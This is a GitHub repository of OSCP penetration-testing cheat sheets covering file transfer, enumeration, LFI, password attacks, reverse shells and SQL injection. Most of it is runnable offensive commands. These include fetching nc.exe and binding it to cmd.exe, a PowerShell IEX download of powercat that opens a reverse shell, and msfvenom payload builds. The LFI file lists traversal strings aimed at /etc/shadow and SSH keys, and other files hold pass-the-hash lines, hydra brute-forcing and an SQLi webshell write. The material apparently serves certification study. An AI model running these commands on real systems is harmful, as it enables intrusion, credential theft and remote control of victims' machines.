Repository: omurugur/OSCP Branch: main Commit: 84e748a21063 Files: 12 Total size: 26.8 KB Directory structure: gitextract_s2w0yhy0/ ├── File_Transfer ├── Index_Detection ├── LFI ├── LICENSE ├── Password_Attack ├── Port_Scan ├── Port_Scan_By_Ports ├── README.md ├── Reverse_Shell ├── Road_Map ├── SQLi └── Useful_Resources ================================================ FILE CONTENTS ================================================ ================================================ FILE: File_Transfer ================================================ #With Curl curl http://XX.XX.XX.XX/test.sh --output test.sh ------------------------ #Paste the following code to get nc in the victim: echo open 21> ftp.txt echo USER offsec>> ftp.txt echo ftp>> ftp.txt echo bin >> ftp.txt echo GET nc.exe >> ftp.txt echo bye >> ftp.txt ftp -v -n -s:ftp.txt nc.exe 1234 -e cmd.exe ------------------------ #Bounce port sanning $ nc $ip 21 220 Femitter FTP Server ready. USER anonymous 331 Password required for anonymous. PASS foo 230 User anonymous logged in. PORT 127,0,0,1,0,80 200 Port command successful. LIST ------------------------ #Nice trick to share folders with RDP: $ rdesktop (ip) -r disk:share=/home/bayo/store ------------------------ #With powershell: $ powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\Users\YOURUSER\Desktop\b.exe')" ------------------------ #Paste the following block in a command line to get a web client: echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs Run with: $ cscript wget.vbs http:///nc.exe nc.exe ================================================ FILE: Index_Detection ================================================ #GOBUSTER • gobuster dir -u http://XX.XX.XX.XX/Customer/Info -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k ------------------------ #with ssl GOBUSTER • gobuster dir -u http://XX.XX.XX.XX -w /usr/share/wordlists/dirbuster -k ------------------------ #DiRB • dirb url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ------------------------ #Davtest • davtest -url http://XX.XX.XX.XX ------------------------ #WPScan • wpscan -u https://omurugur.com/ --disable-tls-checks --enumerate p -- emumerate t --enumerate -u • wpscan --url https://omurugur.com/ --disable-tls-checks --api-tkoen • wpscan --url https://omurugur.com/ -e ap ================================================ FILE: LFI ================================================ #Useful LFI files (nulbyte) ../../../../../etc/passwd%00 ....//....//....//....//....//etc/passwd%00 ..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd ------------------------ #Linux: /etc/passwd /etc/shadow /etc/issue /etc/group /etc/hostname /etc/ssh/ssh_config /etc/ssh/sshd_config /root/.ssh/id_rsa /root/.ssh/authorized_keys /home/user/.ssh/authorized_keys /home/user/.ssh/id_rsa ------------------------ #Apache: Configuration Files: /etc/apache2/apache2.conf /usr/local/etc/apache2/httpd.conf /etc/httpd/conf/httpd.conf ------------------------ #Log Files: Red Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log Debian/Ubuntu-   /var/log/apache2/access.log FreeBSD-   /var/log/httpd-access.log ------------------------ #Generic: /var/log/apache/access.log /var/log/apache/error.log /var/log/apache2/access.log /var/log/apache/error.log ------------------------ #MySql: /var/lib/mysql/mysql/user.frm /var/lib/mysql/mysql/user.MYD /var/lib/mysql/mysql/user.MYI ------------------------ #Windows: /boot.ini /autoexec.bat /windows/system32/drivers/etc/hosts /windows/repair/SAM /windows/panther/unattended.xml /windows/panther/unattend/unattended.xml ------------------------ ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2021 Ömür Uğur Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: Password_Attack ================================================ #SSH Attack with THC-Hydra • hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1 ------------------------ #Remote Desktop Protocol Attack with Crowbar • crowbar -b rdp -s XX.XX.XX.XX/32 -u admin -C ~/password-file.txt -n 1 ------------------------ #HTTP htaccess Attack with Medusa • medusa -h XX.XX.XX.XX -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin ------------------------ #HTTP POST Attack with THC-Hydra • hydra XX.XX.XX.XX http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f ================================================ FILE: Port_Scan ================================================ #Nmap • nmap -sC -sV -O -iP • nmap -p- --min-rate 10000 -oA scans/alltcp XX.XX.XX.XX • nmap -p- -v • nmap -sT -sV -p- XX.XX.XX.XX -oA XX.XX.XX.XX ------------------------ #TCP Top 1000 • nmap -Pn -sC -sV -oA tcp -vv $ip ------------------------ #All TCP Ports: • nmap -Pn -sC -sV -oA all -vv -p- $ip ------------------------ #UDP Top 100: • nmap -Pn -sU --top-ports 100 -oA udp -vv $ip • unicornscan -mU -v -I XX.XX.XX.XX ------------------------ #No Ping • nmap -sV -sC -O -Pn XX.XX.XX.XX ------------------------ #All Port • nmap -sV -sC -O -Pn -p 1-65535 XX.XX.XX.XX ------------------------ #Nmap Detect And Write Stand-up Servers • nmap -v -sn XX.XX.XX.XX-254 -oG upHost.txt ------------------------ #UDP Scan • nmap --top-ports 200 -sU -A XX.XX.XX.XX ------------------------ #With Netcat • nc -nvv -w 1 -z XX.XX.XX.XX 3388-3390 ================================================ FILE: Port_Scan_By_Ports ================================================ #SSH • nmap -sV --script=ssh-* -p 22 XX.XX.XX.XX ------------------------ #SNMP • sudo nmap -sU --open -p 161 XX.XX.XX.XX-254 -oG open-snmp.txt • snmpwalk -c public -v1 -t 10 XX.XX.XX.XX • snmp-check -t $ip -c public • nmap -sU -p161 --script "snmp-*" $ip ------------------------ #Enumerating Windows Users • snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.4.1.77.1.2.25 ------------------------ #Enumerating Running Windows Processes • snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.4.2.1.2 ------------------------ #Enumerating Open TCP Ports • snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.6.13.1.3 ------------------------ #Enumerating Installed Software • snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.6.3.1.2 ------------------------ #SMTP #telnet or netcat connection • nc 25 • VRFY root ------------------------ #Check for commands • nmap -script smtp-commands.nse • nmap XX.XX.XX.XX -p 25 --script=smtp-* • nc -nv XX.XX.XX.XX 25 ------------------------ Command to check if a user exists VRFY root Command to ask the server if a user belongs to a mailing list EXPN root ------------------------ #Always do users enumeration • smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip • smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t $ip ------------------------ #SMB ------------------------ #Enumerate Hostname - nmblookup -A $ip • List Shares • smbmap -H $ip • echo exit | smbclient -L \\\\$ip • nmap --script smb-enum-shares -p 139,445 $ip • smbclient -N -L //XX.XX.XX.XX ------------------------ #Check Null Sessions • smbmap -H $ip • rpcclient -U "" -N $ip • smbclient -N -L \\\\XX.XX.XX.XX\\ • smbclient \\\\$ip\\[share name] • smbclient -L XX.XX.XX.XX--option='client min protocol=NT1' • smbclient -L //XX.XX.XX.XX/ --option='client min protocol=NT1' • smbclient \\\\XX.XX.XX.XX\\'bob share' --option='client min protocol=NT1' ------------------------ #Check for Vulnerabilities - nmap --script smb-vuln* -p 139,445 $ip ------------------------ #Overall Scan - enum4linux -a $ip ------------------------ #Manual Inspection • smbver.sh $ip (port) ------------------------ #rpcclient • rpcclient -U '' $ip • Password: • rpcclient $> srvinfo # operating system version • rpcclient $> netshareenumall # enumerate all shares and its paths • rpcclient $> enumdomusers # enumerate usernames defined on the server • rpcclient $> getdompwinfo # smb password policy configured on the server ------------------------ #CrackMapExe • crackmapexec -u 'guest' -p '' --shares $ip • crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip • crackmapexec -u 'guest' -p '' --users $ip • crackmapexec smb XX.XX.XX.XX/24 -u Administrator -p P@ssw0rd • crackmapexec smb XX.XX.XX.XX/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B • crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz XX.XX.XX.XX/24 • crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip • crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution ------------------------ #smbmap • smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares • smbmap -u guest -p '' -H $ip • smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip • smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir • smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively • smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work • smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work ------------------------ # Share List: • smbclient --list • smbclient -L • smbclient -L //XX.XX.XX.XX ------------------------ # SMB Client: • smbclient //XX.XX.XX.XX/pathname • smbclient -L //XX.XX.XX.XX ------------------------ # SMB Map: • smbmap -H XX.XX.XX.XX • smbmap -H XX.XX.XX.XX -R --depth 5 • smbmap -H htb.local -u -p ------------------------ # Check SMB vulnerabilities: • nmap --script=smb-check-vulns.nse -p445 • nmap --script vuln XX.XX.XX.XX -p445 • nmap --script "vuln" -p139,445 ------------------------ # basic nmap scripts to enumerate shares and OS discovery • nmap -p 139,445 XX.XX.XX.XX/24 --script smb-enum-shares.nse smb-os-discovery.nse • nmap --script smb-enum-shares.nse -p445 XX.XX.XX.XX ------------------------ # Connect using Username • smbclient -L -U username -p 445 ------------------------ # Connect to Shares • smbclient \\\\\\ShareName • smbclient \\\\\\ShareName -U User_name ------------------------ # enumarete with smb-shares, -a “do everything” option • enum4linux -a XX.XX.XX.XX • enum4linux -i XX.XX.XX.XX ------------------------ # learn the machine name and then enumerate with smbclient • nmblookup -A XX.XX.XX.XX • smbclient -L -I XX.XX.XX.XX ------------------------ # DNS ENUM • dnsenum zonetransfer.me ------------------------ # DNS RECON • dnsrecon -d okmurugur.com -t axfr • dnsrecon -d XX.XX.XX.XX -r XX.XX.XX.XX/8 ------------------------ # DNS ENUMERATiON • host www.okmurugur.com • host -t mx okmurugur.com • host -t txt okmurugur.com ------------------------ # DiG • dig axfr @XX.XX.XX.XX okmurugur.com ================================================ FILE: README.md ================================================

OSCP ( Offensive Security Certified Professional )

Donate using Liberapay Overview: Penetration Testing with Kali Linux (PEN-200) is the foundational course at Offensive Security. Those new to OffSec or penetration testing should start here. This online ethical hacking course is self-paced. It introduces penetration testing tools and techniques via hands-on experience. PEN-200 trains not only the skills, but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the coveted Offensive Security Certified Professional (OSCP) certification. To learn more about the modules updated in 2020 and get answers to frequently asked questions, see the announcement blog post. You can find my experience on the OSCP certification exam that I entered in 2021 and succeeded on my site. I wish success to the friends who will take the exam.

References

• https://www.offensive-security.com/pwk-oscp/

Download

Cloning an Existing Repository ( Clone with HTTPS )

root@slife:~# git clone https://github.com/omurugur/OSCP.git
Cloning an Existing Repository ( Clone with SSH )

root@slife:~# git clone git@github.com:omurugur/OSCP.git

Contact

Mail : omurugur12@gmail.com
Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/
GitHub : https://github.com/omurugur
Twitter : https://twitter.com/omurugurrr
Medium : https://omurugur.medium.com/
Donate!

Support the authors: ================================================ FILE: Reverse_Shell ================================================ # Interactive TTY Shell • python -c 'import pty; pty.spawn("/bin/sh")' • python -c 'import pty;pty.spawn("/bin/bash")' • python -c 'import pty; pty.spawn("/bin/bash")' • /usr/bin/script -qc /bin/bash /dev/null ------------------------ # With Powershell • powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://XX.XX.XX.XX/powercat.ps1');powercat -c XX.XX.XX.XX -p 9090 -e cmd" ------------------------ # Reverse Shell #Linux •msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf > shell.elf # PHP •msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -f raw > shell.php # ASP •msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.216 LPORT=443 -f asp > shell.asp # WAR •msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war # JSP •msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp # Exe •msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=445 -f exe -o shell_reverse.exe # ASPX •msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f aspx > shell.aspx # ASPX-x64 •msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1234 -f aspx > 4.aspx ------------------------ #Shell From SQL Injection •windows ?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' •linux ?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE '/var/www/html/cmd.php' ================================================ FILE: Road_Map ================================================ Network Scanning Service Scanning WebApp ☐ Nikto ☐ dirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test ☐ SQL ınjectıon ☐ Default şifre arama Linux\Windows ☒ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Else ☐ nmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the software Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalation ☐ acesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete files ================================================ FILE: SQLi ================================================ #sqlmap ☐ sqlmap -r name.txt --batch --force-ssl ☐ sqlmap -r name.txt --dbms mysql --technique=U --dump --batch ☐ sqlmap -r name.txt --dbms mysql --technique=U --users ☐ sqlmap -r name.txt --dbms mysql --technique=U --passwords ☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --dump ☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --os shel ------------------------ ================================================ FILE: Useful_Resources ================================================ Blog : My experience with the OSCP certification — Security Café PWK and OSCP my experience | Fady Osman’s Technical Blog Offensive Security’s PWB and OSCP — My Experience — Security SiftSecurity Sift Penetration Testing With Backtrack — OSCP — Things all the hacking Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP) OSCP Course and Exam Review — RCE Security Try Harder! An OSCP Review.Blog of Jason Bernier Pentest Tips and Tricks — EK Open Security Research: Using Mimikatz to Dump Passwords! Hacking/OSCP cheatsheet :: Ceso Adventures The CORE Hacking Course — YouTube Eğlence ve Kâr için bir web.config Dosyası Yükleme | Soroush Dalili (@irsdl) — سروش دلیلی NetSecFocus Trophy Room — Google Drive Enumeration : oscp/linux-template.md at master · xapax/oscp oscp/windows-template.md at master · xapax/oscp CTF Series : Vulnerable Machines — tech.bitvijays.com PWK Notes: SMB Enumeration Checklist [Updated] | 0xdf hacks stuff nmapAutomator/nmapAutomator.sh at master · 21y4d/nmapAutomator Privilege_Escalation_Windows: Windows Privilege Escalation Guide FuzzySecurity | Windows Privilege Escalation Fundamentals Windows elevation of privileges (1) Windows Privilege Escalation — AlwaysInstallElevated — YouTube PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit WindowsEnum/WindowsEnum.ps1 at master · absolomb/WindowsEnum Windows-Exploit-Suggester/windows-exploit-suggester.py at master · AonCyberLabs/Windows-Exploit-Suggester Windows Privilege Escalation Methods for Pentesters — Pentest Blog FuzzySecurity | Windows Privilege Escalation Fundamentals Windows Local Privilege Escalation — HackTricks GhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality. Ghostpack-CompiledBinaries/SharpUp.exe at master · r3motecontrol/Ghostpack-CompiledBinaries https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives. Ghostpack-CompiledBinaries/Seatbelt.exe at master · r3motecontrol/Ghostpack-CompiledBinaries privilege-escalation-awesome-scripts-suite/winPEAS at master · carlospolop/privilege-escalation-awesome-scripts-suite bitsadmin/wesng: Windows Exploit Suggester — Next Generation rasta-mouse/Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合 Neohapsis/creddump7 juicy-potato/README.md at master · ohpe/juicy-potato antonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to System itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019 Privilege_Escalation_Linux: sagishahar/lpeworkshop: Windows / Linux Local Privilege Escalation Workshop Linux elevation of privileges LinEnum/LinEnum.sh at master · rebootuser/LinEnum Basic Linux Privilege Escalation Linux Privilege Escalation Scripts Linux Privilege Escalation — HackTricks diego-treitos/linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels Cronjobs’u Kullanarak Linux Ayrıcalık Yükselmesi rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks linted/linuxprivchecker: linuxprivchecker.py — a Linux Privilege Escalation Check Script AlessandroZ/BeRoot: Privilege Escalation Project — Windows / Linux / Mac unix-privesc-check | pentestmonkey jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester Linux Sızma Testlerinde Hak Yükseltme Yöntemleri | SİBER GÜVENLİK PORTALİ Reverse_Shell: reverseshell | pentestmonkey netcat 1.11 for Win32/Win64 Upgrading Simple Shells to Fully Interactive TTYs — ropnop blog Spawning a TTY Shell Reverse Shell Cheat Sheet | pentestmonkey Reverse Shell Cheat Sheet Remote-File-Inclusion-Shell/knock.txt at master · namansahore/Remote-File-Inclusion-Shell BOF: PWK/OSCP — Stack Buffer Overflow Practice — vortex’s blog Seattle Lab Mail (SLmail) 5.5 Üzerinde Stack Tabanlı Bellek Taşma Zafiyetinin İstismarı | SİBER GÜVENLİK PORTALİ (1) Buffer Overflow Exploitation (Minishare & FreeFloat) — YouTube justinsteven/dostackbufferoverflowgood jessekurrus/slmailsploits: Several Python scripts used to fuzz and exploit SLmail. These are meant to supplement the Kali Linux Hands-on Pentesting Udemy course. (2) Immunity Debugger Overview — YouTube Stack Based Buffer Overflow in Win 32 Platform: The Basics Stack Buffer Overflow Zafiyeti — PCMan FTP Server 2.0.7 | Ahmet GÜREL Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains] Zero Day Zen Garden: Windows Exploit Development — Part 4 [Overwriting SEH with Buffer Overflows] Buffer Overflow — Easy Chat Server 3.1 — OnSecurity Buffer Overflow Exploit Geliştirme ~ BTRiskBlog Pentest, ISO27001 ve BT Denetimi Hakkında Herşey Coalfire — The Basics of Exploit Development 1: Win32 Buffer Overflows Coalfire — Coalfire Blog Coalfire — Coalfire Blog Customized Mail Server Software Buffer Overflow on Windows Server 2008 | by Rudy Samuel Pardosi | Medium Vulnserver Kullanarak Basit Bir Arabellek Taşması | Z3R0th tarafından | Orta Bağışıklık Hata Ayıklayıcısı ve Mona.py ile Kötü Karakterler Bulma — Bulb Security minishare 1.4.1 exploit — YouTube SQLI: SQL-Injections · Security — My notepad 44348-error-based-sql-injection-in-order-by-clause-(mssql).pdf Full MSSQL Injection PWNage MSSQL Practical Injection Cheat Sheet — Perspective Risk SQL Injection Cheat Sheet | Netsparker Öner KAYA: Gelişmiş SQL Enjeksiyon İşlemleri (Advanced Sql Injection) Red Team Tales 0x01: From MSSQL to RCE — Tarlogic Security — Cyber Security and Ethical hacking SQL Injection Cheat Sheet | Bhanu Notes SQL-Injections · Total OSCP Guide SQL Tutorial LFI: Hack The Box — Poison Writeup w/o Metasploit | by Rana Khalil | The Startup | Medium (7) HackTheBox — Poison — YouTube